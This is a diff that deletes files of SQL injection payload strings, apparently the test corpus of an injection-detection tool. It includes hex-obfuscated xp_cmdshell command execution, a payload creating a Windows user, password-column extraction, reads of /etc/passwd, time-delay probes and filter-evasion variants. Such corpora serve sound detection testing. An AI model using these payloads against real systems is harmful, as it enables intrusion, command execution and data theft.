|
||||
1; exec will create the case 7
|
||||
`
|
||||
1234`
|
||||
junk <a href="../">foo.com</a>
|
||||
|
||||
|
||||
# bogus
|
||||
1alert(1)
|
||||
|
||||
foo 'null' bar
|
||||
User(foo),junk
|
||||
User(login_name),Images(url_170x135)
|
||||
mr and mrs table sign
|
||||
USPS 1-3 Day (USPS doesn't guarantee 3 day arrival)
|
||||
foo or bar add 1
|
||||
Apt is gated; call when you get here, and we'll come down to get it.
|
||||
DaVi - Open and Close Your Blinds With Your Phone!
|
||||
Foo and 80's Foo / Bar
|
||||
Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended
|
||||
Same as reward #1 however
|
||||
foobar sent you 1 message about
|
||||
4.7" & iPhone 6 Plus 5.5
|
||||
Family and friends having meal outdoors
|
||||
<table width="99%" border="0" cellpadding="1"'
|
||||
8-bit Limit (BRK)
|
||||
3rd space(s)
|
||||
Ink and White Out 2 in 1 Pen
|
||||
Reality check (2016)
|
||||
Please select pair #1
|
|
@ -1,30 +0,0 @@
|
|||
# https://twitter.com/ru_raz0r/status/750311113435283456
|
||||
#
|
||||
username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test'
|
||||
username'declare @s varchar (8000); ...
|
||||
username'DECLARE @find varchar(30) = 'Man%'
|
||||
'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end
|
||||
'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch--
|
||||
'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch--
|
||||
'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end
|
||||
'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end--
|
||||
'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
|
||||
'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
||||
'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
|
|
@ -1,11 +0,0 @@
|
|||
# Not sure of original source
|
||||
# attributed to David Litchfield
|
||||
#
|
||||
234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29
|
||||
foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29--
|
||||
|
||||
456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10
|
||||
foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10--
|
||||
|
||||
# overflow
|
||||
123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29
|
|
@ -1,73 +0,0 @@
|
|||
|
||||
# samples
|
||||
# unlikely to execute correctly
|
||||
# probably just generated automatically without regard for usefulness
|
||||
# but seen in wild "FIELD AND NUM=NUM"
|
||||
|
||||
# FAILS
|
||||
#"1*HOPE AND 8=3",
|
||||
#"0+HOPE AND 8=3",
|
||||
#"0+(HOPE) AND 8=3",
|
||||
HOPE%2A1+AND+8%3D3
|
||||
## HOPE%2A%281%29+AND+8%3D3
|
||||
|
||||
# RHS variations
|
||||
HOPE+AND+8%3D3
|
||||
HOPE+AND+-8%3D3
|
||||
HOPE+AND+-8%3D-3
|
||||
HOPE+AND+%28-8%29%3D%28-3%29
|
||||
HOPE+AND+%288%29%3D3
|
||||
HOPE+AND+8%3D%283%29
|
||||
HOPE+AND+%288%29%3D%283%29
|
||||
HOPE+AND+1%2B2%3D3%2B4
|
||||
HOPE+AND+COS%283%29%3DSIN%284%29
|
||||
|
||||
# lhs work arounds
|
||||
HOPE%2A1+AND+8%3D3
|
||||
## HOPE%2A%281%29+AND+8%3D3
|
||||
%28HOPE%29+AND+8%3D3
|
||||
%28HOPE%29%2A1+AND+8%3D3
|
||||
%28HOPE%29%2B0+AND+8%3D3
|
||||
1%2A%28HOPE%29+AND+8%3D3
|
||||
%281%29%2A%28HOPE%29+AND+8%3D3
|
||||
%281%29%2AHOPE+AND+8%3D3
|
||||
%28%281%29%29%2AHOPE+AND+8%3D3
|
||||
%28%281%29%29%2A%28HOPE%29+AND+8%3D3
|
||||
%28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3
|
||||
%28%28%281%29%29%29%2AHOPE+AND+8%3D3
|
||||
%28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3
|
||||
|
||||
# based on NUM AND 1=1--
|
||||
PI%28%29+AND+COS%28PI%28%29%29%3D-1
|
||||
PI%28%29+%26%26+COS%28PI%28%29%29%3D-1
|
||||
FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0
|
||||
-9-%282%29+OR+1+%3D+1
|
||||
8-9+OR+1+%3D+1
|
||||
-9-%282%29+OR+1+%3D+1
|
||||
-9-%28%282%29%29+OR+1+%3D+1
|
||||
-9-%28%28%282%29%29%29+OR+1+%3D+1
|
||||
%7E9-%282%29+OR+1+%3D+%7E1
|
||||
a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29--
|
||||
a%27%2712%27+and+pi%28%29%3Dpi%28%29--
|
||||
dingberry%27%271%27+and+%28false%29--
|
||||
dingberry%27%271%27+and+%28pi%28%29%3D3%29--
|
||||
dingberry%27%271%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2712%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%2712%27+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
|
||||
1%2Bpi%28%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29--
|
||||
1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29--
|
||||
1234%27%27z%27+and+%283%3Dpi%28%29%29--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21--
|
||||
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29--
|
||||
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3--
|
||||
foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3--
|
|
@ -1,15 +0,0 @@
|
|||
#
|
||||
# from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
|
||||
#
|
||||
999999 or 1=1 or 1=1
|
||||
' or 1=1 or '1'='1
|
||||
" or 1=1 or "1"="1
|
||||
999999) or 1=1 or (1=1
|
||||
') or 1=1 or ('1'='1
|
||||
") or 1=1 or ("1"="1
|
||||
999999)) or 1=1 or ((1=1
|
||||
')) or 1=1 or (('1'='1
|
||||
")) or 1=1 or (("1"="1
|
||||
999999))) or 1=1 or (((1
|
||||
'))) or 1=1 or ((('1'='1
|
||||
"))) or 1=1 or ((("1"="1
|
|
@ -1,44 +0,0 @@
|
|||
#
|
||||
# http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
|
||||
#
|
||||
1 or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or 1=1
|
||||
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
|
||||
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6) as test
|
||||
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
|
||||
9999" or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or "0"="9999
|
||||
9999'+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+'9999
|
||||
9999"+(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)+"9999
|
||||
9999'||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||'9999
|
||||
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
|
||||
(select like('abcdefg',upper(hex(randomblob(150000000))))) as test
|
||||
(select like('abcdefg',upper(hex(randomblob(150000000)))))
|
||||
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
|
||||
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
|
||||
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) as test
|
||||
(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)
|
||||
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
|
||||
9999"||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||"9999
|
||||
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
|
||||
benchmark(15000000,md5(0x4e446b6e))-9999
|
||||
9999' or benchmark(15000000,md5(0x4e446b6e)) or '0'='9999
|
||||
9999" or benchmark(15000000,md5(0x4e446b6e)) or "0"="9999
|
||||
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
|
||||
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)
|
||||
9999'+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+'9999
|
||||
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
|
||||
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3) as test
|
||||
(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)
|
||||
9999'||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||'9999
|
||||
9999"||(select count(*) from domain.domains as t1,domain.columns as t2,domain.tables as t3)||"9999
|
||||
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
|
||||
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
|
||||
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
|
||||
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
|
||||
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
|
||||
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
|
||||
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
|
||||
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
|
||||
(select 99999999 from pg_sleep(15)) as test
|
||||
(select 99999999 from pg_sleep(15))
|
||||
9999'||(select 99999999 from pg_sleep(15))||'9999
|
||||
9999"||(select 99999999 from pg_sleep(15))||"9999
|
|
@ -1,15 +0,0 @@
|
|||
# http://www.blackhatlibrary.net/Comparative_precomputation
|
||||
ascii(substring(version() from 1 for 1))
|
||||
length((select length(version())))
|
||||
ascii(substring(length(version()),1,1))
|
||||
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
|
||||
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
|
||||
vulnerable_site' and 1=5 or title=() #'
|
||||
conv(hex(substr(version() FROM 1 FOR 2)),16,10)
|
||||
conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6
|
||||
conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6
|
||||
uncompress(compress(version()))
|
||||
LENGTH(compress(version()))
|
||||
LENGTH(version())
|
||||
LENGTH(load_file('/etc/passwd'))
|
||||
LENGTH(compress(load_file('/etc/passwd')))
|
|
@ -1,40 +0,0 @@
|
|||
# http://www.exploit-db.com/papers/17934/
|
||||
# A few typos corrected
|
||||
|
||||
1+or+1+%3D+1
|
||||
1+%7C%7C+1+%3D+1
|
||||
1+and+1+%3D+1
|
||||
1+%26%26+1+%3D+1
|
||||
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
|
||||
1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
|
||||
1+%7C%7C+user_id+is+not+null
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29
|
||||
1+%7C%7C+lpad%28user%2C7%2C1%29
|
||||
1%0b||%0blpad(user,7,1)
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273
|
||||
1+UnIoN/**/SeLecT/**/1,2,3--
|
||||
# double url-encoded
|
||||
## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
|
||||
21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users--
|
||||
1+/**/union/**/select
|
||||
1+/%2A%2A/union/%2A%2A/select
|
||||
1+%2f**%2funion%2f**%2fselect
|
||||
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
|
||||
0+div+1+union+select+1%2C2%2Ccurrent_user
|
||||
1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
|
||||
1/*!UnIoN*/SeLecT+1,2,3--
|
||||
=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
|
||||
1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+--
|
File diff suppressed because it is too large
Load Diff
|
@ -1,131 +0,0 @@
|
|||
#
|
||||
# Frequently not SQLi but
|
||||
#
|
||||
select 1 from foo where
|
||||
select @version from foo where
|
||||
select 'foo' from bar where
|
||||
# select 1,1,1,1,1,1,1
|
||||
# select @version,@version,@version
|
||||
# select 'foo','bar',1,2,3,4
|
||||
|
||||
select sin(1),2 from bar where
|
||||
select sin(id),2 from bar where
|
||||
select sin('1'),2 from bar where
|
||||
select sin(@version),2 from bar where
|
||||
select sin((1)),2 from bar where
|
||||
select sin((id)),2 from bar where
|
||||
select sin(('1')),2 from bar where
|
||||
select sin((@version)),2 from bar where
|
||||
select sin(((1)),2 from bar where
|
||||
select sin(((id)),2 from bar where
|
||||
select sin((('1')),2 from bar where
|
||||
select sin(((@version)),2 from bar where
|
||||
|
||||
select -sin(1),2 from bar where
|
||||
select -sin(id),2 from bar where
|
||||
select -sin('1'),2 from bar where
|
||||
select -sin(@version),2 from bar where
|
||||
select -sin((1)),2 from bar where
|
||||
select -sin((id)),2 from bar where
|
||||
select -sin(('1')),2 from bar where
|
||||
select -sin((@version)),2 from bar where
|
||||
select -sin(((1)),2 from bar where
|
||||
select -sin(((id)),2 from bar where
|
||||
select -sin((('1')),2 from bar where
|
||||
select -sin(((@version)),2 from bar where
|
||||
|
||||
select 1,sin(1),2 from bar where
|
||||
select 1,sin(id),2 from bar where
|
||||
select 1,sin('1'),2 from bar where
|
||||
select 1,sin(@version),2 from bar where
|
||||
select 1,sin((1)),2 from bar where
|
||||
select 1,sin((id)),2 from bar where
|
||||
select 1,sin(('1')),2 from bar where
|
||||
select 1,sin((@version)),2 from bar where
|
||||
select 1,sin(((1)),2 from bar where
|
||||
select 1,sin(((id)),2 from bar where
|
||||
select 1,sin((('1')),2 from bar where
|
||||
select 1,sin(((@version)),2 from bar where
|
||||
|
||||
select -1,sin(1),2 from bar where
|
||||
select -1,sin(id),2 from bar where
|
||||
select -1,sin('1'),2 from bar where
|
||||
select -1,sin(@version),2 from bar where
|
||||
select -1,sin((1)),2 from bar where
|
||||
select -1,sin((id)),2 from bar where
|
||||
select -1,sin(('1')),2 from bar where
|
||||
select -1,sin((@version)),2 from bar where
|
||||
select -1,sin(((1)),2 from bar where
|
||||
select -1,sin(((id)),2 from bar where
|
||||
select -1,sin((('1')),2 from bar where
|
||||
select -1,sin(((@version)),2 from bar where
|
||||
|
||||
select id,sin(1),2 from bar where
|
||||
select id,sin(id),2 from bar where
|
||||
select id,sin('1'),2 from bar where
|
||||
select id,sin(@version),2 from bar where
|
||||
select id,sin((1)),2 from bar where
|
||||
select id,sin((id)),2 from bar where
|
||||
select id,sin(('1')),2 from bar where
|
||||
select id,sin((@version)),2 from bar where
|
||||
select id,sin(((1)),2 from bar where
|
||||
select id,sin(((id)),2 from bar where
|
||||
select id,sin((('1')),2 from bar where
|
||||
select id,sin(((@version)),2 from bar where
|
||||
|
||||
select @version,sin(1),2 from bar where
|
||||
select @version,sin(id),2 from bar where
|
||||
select @version,sin('1'),2 from bar where
|
||||
select @version,sin(@version),2 from bar where
|
||||
select @version,sin((1)),2 from bar where
|
||||
select @version,sin((id)),2 from bar where
|
||||
select @version,sin(('1')),2 from bar where
|
||||
select @version,sin((@version)),2 from bar where
|
||||
select @version,sin(((1)),2 from bar where
|
||||
select @version,sin(((id)),2 from bar where
|
||||
select @version,sin((('1')),2 from bar where
|
||||
select @version,sin(((@version)),2 from bar where
|
||||
|
||||
select '1',sin(1),2 from bar where
|
||||
select '1',sin(id),2 from bar where
|
||||
select '1',sin('1'),2 from bar where
|
||||
select '1',sin(@version),2 from bar where
|
||||
select '1',sin((1)),2 from bar where
|
||||
select '1',sin((id)),2 from bar where
|
||||
select '1',sin(('1')),2 from bar where
|
||||
select '1',sin((@version)),2 from bar where
|
||||
select '1',sin(((1)),2 from bar where
|
||||
select '1',sin(((id)),2 from bar where
|
||||
select '1',sin((('1')),2 from bar where
|
||||
select '1',sin(((@version)),2 from bar where
|
||||
|
||||
select -'1',sin(1),2 from bar where
|
||||
select -'1',sin(id),2 from bar where
|
||||
select -'1',sin('1'),2 from bar where
|
||||
select -'1',sin(@version),2 from bar where
|
||||
select -'1',sin((1)),2 from bar where
|
||||
select -'1',sin((id)),2 from bar where
|
||||
select -'1',sin(('1')),2 from bar where
|
||||
select -'1',sin((@version)),2 from bar where
|
||||
select -'1',sin(((1)),2 from bar where
|
||||
select -'1',sin(((id)),2 from bar where
|
||||
select -'1',sin((('1')),2 from bar where
|
||||
select -'1',sin(((@version)),2 from bar where
|
||||
|
||||
select 1,(2),3 from bar where
|
||||
select (1),(2),3 from bar where
|
||||
select ((1)),(2),3 from bar where
|
||||
select (((1))),(2),3 from bar where
|
||||
select ('1'),(2),3 from bar where
|
||||
select (('1')),(2),3 from bar where
|
||||
select ((('1'))),(2),3 from bar where
|
||||
select (@version),(2),3 from bar where
|
||||
select ((@version)),(2),3 from bar where
|
||||
select (((@version))),(2),3 from bar where
|
||||
select (id),(2),3 from bar where
|
||||
select ((id)),(2),3 from bar where
|
||||
select (((id))),(2),3 from bar where
|
||||
|
||||
select (@version),(2),3 from bar where
|
||||
select (((((1,2,3,4)))) from bar
|
||||
|
|
@ -1,315 +0,0 @@
|
|||
#
|
||||
#
|
||||
#
|
||||
( 'a' ) --
|
||||
' - ( (SELECT BINARY ( 'b')) ) --
|
||||
' - ( ( BINARY COS ( 'b')) ) --
|
||||
' - ( BINARY BINARY ( 'b') ) --
|
||||
( 1 OR 1 ) --
|
||||
( 1 OR @a ) --
|
||||
( ( 1 ) ) --
|
||||
( 1 * @a ) --
|
||||
( (SELECT ( 1)) ) --
|
||||
( (SELECT ( @a)) ) --
|
||||
( BINARY ( 1) ) --
|
||||
( BINARY ( @a) ) --
|
||||
( @a OR 1 ) --
|
||||
( @a OR @a ) --
|
||||
( ( @a ) ) --
|
||||
( ( 1 OR 'b') ) --
|
||||
( ( 1 * 'b') ) --
|
||||
( (SELECT ( SELECT 'b')) ) --
|
||||
( ( SELECT ( 'b')) ) --
|
||||
( (SELECT 1 OR 'b') ) --
|
||||
( (SELECT 'a' OR 'b') ) --
|
||||
( (SELECT BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR 'b') ) --
|
||||
( COS ( 1 OR 'b') ) --
|
||||
( COS ( 'a' OR 'b') ) --
|
||||
( COS ( BINARY ( 'b')) ) --
|
||||
( COS ( BINARY COS ( 'b')) ) --
|
||||
( COS ( @a OR 'b') ) --
|
||||
( 'a' OR 1 ) --
|
||||
( 'a' OR 'a' ) --
|
||||
( 'a' OR @a ) --
|
||||
( 'a' ) --
|
||||
( 'a' * 1 ) --
|
||||
( 'a' * 'a' ) --
|
||||
( 'a' * @a ) --
|
||||
( BINARY ( SELECT 'b') ) --
|
||||
( ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY COS ( 'b') ) --
|
||||
( ( @a OR 'b') ) --
|
||||
( ( @a * 'b') ) --
|
||||
( 1 in ( BINARY COS ( 'b')) ) --
|
||||
( (SELECT ( 1 OR 'b')) ) --
|
||||
( (SELECT ( SELECT 1)) ) --
|
||||
( (SELECT ( SELECT @a)) ) --
|
||||
( (SELECT ( 'a' OR 'b')) ) --
|
||||
( (SELECT ( BINARY ( 'b'))) ) --
|
||||
( (SELECT ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR 'b')) ) --
|
||||
( (SELECT 1 OR ( 'b')) ) --
|
||||
( (SELECT 1 OR 1) ) --
|
||||
( (SELECT 1 OR COS ( 'b')) ) --
|
||||
( (SELECT 1 OR @a) ) --
|
||||
( (SELECT 1 LIMIT 1) ) --
|
||||
( (SELECT COS ( 1 OR 'b')) ) --
|
||||
( (SELECT COS ( ( SELECT 'b'))) ) --
|
||||
( (SELECT COS ( 'a' OR 'b')) ) --
|
||||
( (SELECT COS ( BINARY ( 'b'))) ) --
|
||||
( (SELECT COS ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT COS ( @a OR 'b')) ) --
|
||||
( (SELECT 'a' OR ( 'b')) ) --
|
||||
( (SELECT 'a' OR 1) ) --
|
||||
( (SELECT 'a' OR COS ( 'b')) ) --
|
||||
